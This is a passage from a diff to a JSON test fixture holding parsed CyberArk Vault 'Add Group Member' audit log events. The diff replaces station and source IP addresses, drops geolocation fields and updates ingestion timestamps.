Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMPGW_VAGRANT", "source_user": "PVWAGWAccounts", 
@@ -730,8 +601,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730057300Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group 
Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577519400Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_VAGRANT\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
08:59:38\",\"IsoTimestamp\":\"2021-03-11T16:59:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_VAGRANT\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -743,17 +614,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -770,7 +632,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -778,8 +640,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:17Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group 
Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMPGW_SSH", "source_user": "PVWAGWAccounts", 
@@ -795,8 +657,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730093300Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group 
Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577525Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWAccounts\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPGW_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -808,17 +670,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -835,7 +688,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -843,8 +696,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:17Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group 
Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMPApp_SSH", "source_user": "PSMAppUsers", 
@@ -860,8 +713,8 @@ "event": { "severity": 2, "action": "add group member", - "ingested": "2021-06-09T10:24:29.730110900Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group 
Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.577530300Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e265\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMAppUsers\u003c/SourceUser\u003e\\n \u003cTargetUser\u003ePSMPApp_SSH\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:17\",\"IsoTimestamp\":\"2021-03-14T12:57:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_SSH\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" } @@ -873,17 +726,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -900,7 +744,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -908,8 +752,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:21Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e265\u003c/MessageID\u003e\n 
\u003cDesc\u003eAdd Group Member\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd Group Member\u003c/Action\u003e\n \u003cSourceUser\u003ePSMP_ADB_AppUsers\u003c/SourceUser\u003e\n \u003cTargetUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Group Member\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Group Member", "target_user": "PSMP_ADB_asr-cyberark-psm-ssh", "source_user": "PSMP_ADB_AppUsers", 
